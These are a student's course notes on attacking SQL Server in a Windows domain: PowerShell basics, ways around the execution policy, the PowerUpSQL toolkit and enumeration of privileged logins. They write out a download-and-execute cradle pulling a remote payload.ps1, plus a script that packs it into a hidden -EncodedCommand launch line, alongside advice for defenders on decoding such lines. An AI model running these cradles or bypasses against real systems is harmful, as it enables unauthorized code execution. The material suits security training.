Abusing SQL Server Trusts in a Windows Domain (video notes) (in progress)
Video 1 - Introduction:
Course Content:
- Introduction to SQL server:
- SQL server roles and privileges
- introduction to PowerShell
- Discovery, Enumeration and Scanning
- Brute Force Attacks
- Privilege Escalation
- OS Command Execution
- Trust abuse and Lateral movement
- Persistence
- Identifying Juicy Information
- Defenses and Detection!
##############################
Video 2 - SQL Server:
- Integrates with domain by providing Windows authentication
- used by many enterprise applications
- most enterprise networks have sizable number of SQL server instances
Principals:
- Principals (think: account types) are the entities that can request access to resources on a SQL Server instance.
- Every principal has a Security Identifier (SID): Windows principals keep their Windows/domain SID, SQL logins get one generated by the instance.
- The scope of a principal depends on where it is defined:
- Windows-level: domain or local users and groups (mapped to logins)
- Server-level: SQL Server logins (used to connect to an instance)
- Database-level: database users (used to determine permissions within a database; a login is mapped to a user per database)
- Nine fixed server roles (their permissions cannot be changed, except for public) plus user-defined server roles.
- Each member of a fixed server role can add other logins to that same role:
- sysadmin - God mode :)
- securityadmin - Path to God mode (manages logins and can GRANT server-level permissions, including CONTROL SERVER, so treat it as equivalent to sysadmin)
- public - Everyone (every login is a member; by default it can CONNECT to the endpoints and has VIEW ANY DATABASE)
Look up SQL Server - Roles and Privileges!
https://ift.tt/2x1EJ2F
###############################
Video 3 - PowerShell:
- Provides access to almost everything on the Windows platform and in an Active Directory environment, which is useful for an attacker.
- Can run powerful scripts entirely from memory, which makes it well suited to post-exploitation from a foothold shell or box.
- Easy to Learn and really Powerful!
- Based on the .NET framework and is tightly integrated with Windows.
- PowerShell Core is platform independent.
PowerShell Help System:
Get-Help Get-Help
- Shows a brief help about the cmdlet or topic
- support wildcard
- comes with various options and filters
- Get-Help, help and -? can all be used to display help.
- Get-Help about_<topic> gives help for conceptual topics (for example Get-Help about_Execution_Policies).
Example:
Get-Help Get-Help
Get-Help Get-Process
help process                 # lists every help topic whose name contains "process"
Get-Help *                   # lists all available help topics
Get-Help Get-Item -Full      # full help for a cmdlet (Get-Item here), including parameter details
Get-Help Get-Item -Examples  # only the examples of how to run a cmdlet (Get-Item here)
Update-Help                  # downloads/updates the local help content (v3+, run as administrator)
help Get-Process -Full       # 'help' is a wrapper function around Get-Help that pages the output
Get-Alias -Definition help   # shows aliases pointing at 'help' (man -> help)
- we can also try:
PS C:\Users\victim.LETHALLAB> help process

Name                    Category   Module                      Synopsis
----                    --------   ------                      --------
Enter-PSHostProcess     Cmdlet     Microsoft.PowerShell.Core   ...
Exit-PSHostProcess      Cmdlet     Microsoft.PowerShell.Core   ...
Get-PSHostProcessInfo   Cmdlet     Microsoft.PowerShell.Core   ...
Debug-Process           Cmdlet     Microsoft.PowerShell.M...   ...
Get-Process             Cmdlet     Microsoft.PowerShell.M...   ...
Start-Process           Cmdlet     Microsoft.PowerShell.M...   ...
Stop-Process            Cmdlet     Microsoft.PowerShell.M...   ...
Wait-Process            Cmdlet     Microsoft.PowerShell.M...   ...
Cmdlets:
- are used to perform an action; the output is a .NET object, not text
- cmdlets accept parameters for different operations
- they have aliases
- they are NOT standalone executables: compiled cmdlets are .NET classes, and a script function with [CmdletBinding()] behaves like one, so you can write your own in a few lines of script.

PS C:\Users\victim.LETHALLAB> Get-Alias -Definition get-process

CommandType     Name                  Version    Source
-----------     ----                  -------    ------
Alias           gps -> Get-Process
Alias           ps -> Get-Process
- Use the below command for listing of all cmdlets:
Get-Command -CommandType cmdlet
- There are many interesting cmdlets from a pentester's perspective!
For example: 'Get-Process' lists processes running on a system!
PS C:\Users\victim.LETHALLAB> get-command -commandtype cmdlet |Measure-Object
Count : 489
Average :
Sum :
Maximum :
Minimum :
Property :
PowerShell Scripts:
- can use cmdlets, native commands, functions, .NET, DLLs, the Windows API and much more in a single 'program'
- PowerShell scripts are really powerful and can do a lot in few lines.
- Easy syntax (mostly ;) and easy to execute.
PowerShell Scripts:ISE
- it is a GUI Editor/Scripting Environment
- tab completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features.
- comes with a handy console pane to run commands from the ISE.
PowerShell Scripts: Execution Policy
- it is NOT a security measure; it exists to prevent users from accidentally executing scripts (Microsoft calls it a safety feature, not a security boundary)
- it only governs loading of script files, so there are several ways around it:
powershell.exe -ExecutionPolicy Bypass -File .\script.ps1
powershell.exe -Command "<cmd>"                 # or -c; a command string is never subject to the policy
powershell.exe -EncodedCommand <base64>         # or -enc; Base64 of the UTF-16LE command text
PS C:\Users\victim.LETHALLAB\Downloads> .\Get-SQLInstance.ps1
.\Get-SQLInstance.ps1 : File C:\Users\victim.LETHALLAB\Downloads\Get-SQLInstance.ps1 cannot be loaded because running
scripts is disabled on this system.
PS C:\Users\victim.LETHALLAB> Get-ExecutionPolicy
Restricted
PS C:\Users\victim.LETHALLAB> powershell.exe -ExecutionPolicy bypass
Windows PowerShell
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\victim.LETHALLAB> cd .\Downloads\
PS C:\Users\victim.LETHALLAB\Downloads> ls

    Directory: C:\Users\victim.LETHALLAB\Downloads

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/2/2018   1:48 PM          12753 Get-SQLInstance.ps1
PS C:\Users\victim.LETHALLAB\Downloads> .\Get-SQLInstance.ps1
PowerShell Modules:
- powershell also supports modules
- a module can be imported with:
Import-Module <path to module>
- all the commands in a module can be listed with:
Get-Command -Module <moduleName>
PS C:\Users\victim.LETHALLAB\Downloads> import-module .\PowerUpSQL-master\PowerUpSQL.psd1
WARNING: The names of some imported commands from the module 'PowerUpSQL' include unapproved verbs that might make them
less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose
parameter. For a list of approved verbs, type Get-Verb.
PS C:\Users\victim.LETHALLAB\Downloads> import-module .\PowerUpSQL-master\PowerUpSQL.psd1 -Verbose
<abbreviated>
VERBOSE: Importing function 'Create-SQLFileXpDll'.
VERBOSE: Importing function 'Get-SQLAgentJob'.
VERBOSE: Importing function 'Get-SQLAssemblyFile'.
VERBOSE: Importing function 'Get-SQLAuditDatabaseSpec'.
VERBOSE: Importing function 'Get-SQLAuditServerSpec'.
VERBOSE: Importing function 'Get-SQLColumn'.
VERBOSE: Importing function 'Get-SQLColumnSampleData'.
<abbreviated>
PS C:\Users\victim.LETHALLAB\Downloads> get-command -module PowerUpSQL
CommandType     Name                          Version    Source
-----------     ----                          -------    ------
Function        Create-SQLFileCLRDll          1.104.11   PowerUpSQL
Function        Create-SQLFileXpDll           1.104.11   PowerUpSQL
Function        Get-SQLAgentJob               1.104.11   PowerUpSQL
Function        Get-SQLAssemblyFile           1.104.11   PowerUpSQL
Function        Get-SQLAuditDatabaseSpec      1.104.11   PowerUpSQL
Function        Get-SQLAuditServerSpec        1.104.11   PowerUpSQL
<abbreviated>
PS C:\Users\victim.LETHALLAB\Downloads>
Whenever there is a command execution opportunity (for example xp_cmdshell on a SQL Server), PowerShell scripts can be executed using the following methods:
-> Download/execute cradle (the script never touches disk):
iex(New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
-> -EncodedCommand (the whole command passed as Base64 of UTF-16LE text)
Check Out Invoke-CradleCrafter:
https://ift.tt/2vdU3Eq
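The two execution tricks above (running under a Restricted execution policy, and packaging a cradle as an -EncodedCommand) hinge on one detail the notes do not spell out: powershell.exe expects Base64 over UTF-16LE, not UTF-8. The block below is an added example, not code from the course, PowerUpSQL or Invoke-CradleCrafter. It builds an encoded command from a cradle string (the URL https://webserver/payload.ps1 is a placeholder and is never fetched), runs a harmless encoded command through a child powershell.exe to show that the policy does not stop it, and decodes a constructed log line the way a defender would when triaging a 4688 or Sysmon event. The sample log line is constructed here for the example.

```powershell
# Added example: -EncodedCommand encode/decode round trip (not from the course).

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # powershell.exe -EncodedCommand expects Base64 of the UTF-16LE bytes of the text.
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    # Reverse operation; what you run over -enc blobs found in process
    # creation logs (Security 4688 / Sysmon event 1) or ScriptBlock logs (4104).
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# The download cradle from the notes is what we encode. Placeholder host; not fetched here.
$cradle = "iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')"
$enc    = ConvertTo-EncodedCommand -Command $cradle

"Command line as an attacker would launch it (execution policy does not apply):"
"powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand $enc"

# Sanity checks: UTF-8 would produce a different blob that powershell.exe cannot
# decode correctly, and the UTF-16LE blob must round-trip exactly.
$utf8 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($cradle))
if ($utf8 -eq $enc) { throw 'unexpected: UTF-8 and UTF-16LE blobs matched' }
if ((ConvertFrom-EncodedCommand -Base64 $enc) -ne $cradle) { throw 'round-trip failed' }
"Round-trip OK"

# Prove the mechanism with a harmless payload: even under Get-ExecutionPolicy = Restricted
# the child process runs the encoded command, because no script file is loaded.
& powershell.exe -NoProfile -EncodedCommand (ConvertTo-EncodedCommand -Command 'Get-ExecutionPolicy; Get-Date')

# Defender side: decode a -enc blob out of a constructed CommandLine field.
# Note that any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...) is accepted by powershell.exe.
$loggedCommandLine = 'powershell.exe  -NoP -W Hidden -enc ' + $enc   # constructed sample, not a real log
if ($loggedCommandLine -match '-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)') {
    'Decoded from constructed log line: ' + (ConvertFrom-EncodedCommand -Base64 $Matches[1])
}
```

The detection takeaway: the encoded form hides nothing from anyone who logs command lines; it only defeats naive string matching on "iex" or "DownloadString", so decode before matching.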
SQLServer and PowerShell:
PowerShell can be used to connect to SQL Server using any of the following methods:
- SQLPS module (ships with SQL Server Management Studio / the SQL Server client tools)
- SQL Server Management Objects (SMO)
- .NET (System.Data.Sql and System.Data.SqlClient, e.g. SqlConnection and SqlCommand; available on any Windows box without SQL tools installed)
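The .NET option is the one that works from a bare foothold, because System.Data.SqlClient is part of the framework on every Windows host. The block below is an added example, not the course's or PowerUpSQL's code. It connects with Integrated (Windows) authentication, asks the instance who it thinks we are and whether we already sit in sysadmin or securityadmin, and then lists the server principals from Video 2 together with their SIDs and fixed server role membership. The instance name sqlsrv01.lethallab.local is an assumed placeholder; replace it with host\instance or host,port.

```powershell
# Added example: connect via System.Data.SqlClient and enumerate principals/roles (not course code).

# Assumed target; any host\instance or host,port string SqlClient accepts works here.
$Instance = 'sqlsrv01.lethallab.local'

function Invoke-SqlQuery {
    param(
        [Parameter(Mandatory)][string]$Instance,
        [Parameter(Mandatory)][string]$Query,
        [int]$TimeoutSeconds = 5
    )
    # Integrated Security=SSPI uses the current Windows/Kerberos token,
    # so no password is ever on the command line or in the script.
    $connString = "Server=$Instance;Database=master;Integrated Security=SSPI;Connection Timeout=$TimeoutSeconds"
    $conn = New-Object System.Data.SqlClient.SqlConnection -ArgumentList $connString
    try {
        $conn.Open()
        $cmd = $conn.CreateCommand()
        $cmd.CommandText = $Query
        $adapter = New-Object System.Data.SqlClient.SqlDataAdapter -ArgumentList $cmd
        $table   = New-Object System.Data.DataTable
        [void]$adapter.Fill($table)
        $table.Rows        # emit one DataRow per result row
    }
    finally {
        $conn.Dispose()
    }
}

# Who does SQL Server think we are, and do we already hold a privileged fixed role?
$whoAmI = @"
SELECT SYSTEM_USER                       AS login_name,
       USER_NAME()                       AS db_user,
       IS_SRVROLEMEMBER('sysadmin')      AS is_sysadmin,
       IS_SRVROLEMEMBER('securityadmin') AS is_securityadmin,
       @@VERSION                         AS version
"@
Invoke-SqlQuery -Instance $Instance -Query $whoAmI |
    Select-Object login_name, db_user, is_sysadmin, is_securityadmin, version |
    Format-List

# Server principals (SQL logins, Windows users, Windows groups) with SID and the
# fixed/user-defined server roles each one is a member of.
# Caveat: a low-privileged login only sees itself, the system logins and the roles;
# seeing every login needs ALTER ANY LOGIN or VIEW ANY DEFINITION at server scope.
$principals = @"
SELECT p.name,
       p.type_desc,
       p.is_disabled,
       CONVERT(varchar(85), p.sid, 1) AS sid_hex,
       STUFF((SELECT ',' + r.name
              FROM sys.server_role_members m
              JOIN sys.server_principals r ON r.principal_id = m.role_principal_id
              WHERE m.member_principal_id = p.principal_id
              FOR XML PATH('')), 1, 1, '') AS server_roles
FROM sys.server_principals p
WHERE p.type IN ('S', 'U', 'G')   -- S = SQL login, U = Windows user, G = Windows group
ORDER BY p.name
"@
Invoke-SqlQuery -Instance $Instance -Query $principals |
    Select-Object name, type_desc, is_disabled, sid_hex, server_roles |
    Format-Table -AutoSize
```

Anything showing sysadmin or securityadmin in server_roles is a direct path to OS command execution on that host; a Windows group in that list is worth checking in AD, since group membership rather than the login itself is what grants the role.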
PowerUpSQL:
A PowerShell toolkit for attacking SQL servers:
https://ift.tt/2cJD2ZD
"The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation on scale."
#################################
Video 4 - Discovering SQL Server within the Domain:
Thursday, September 6, 2018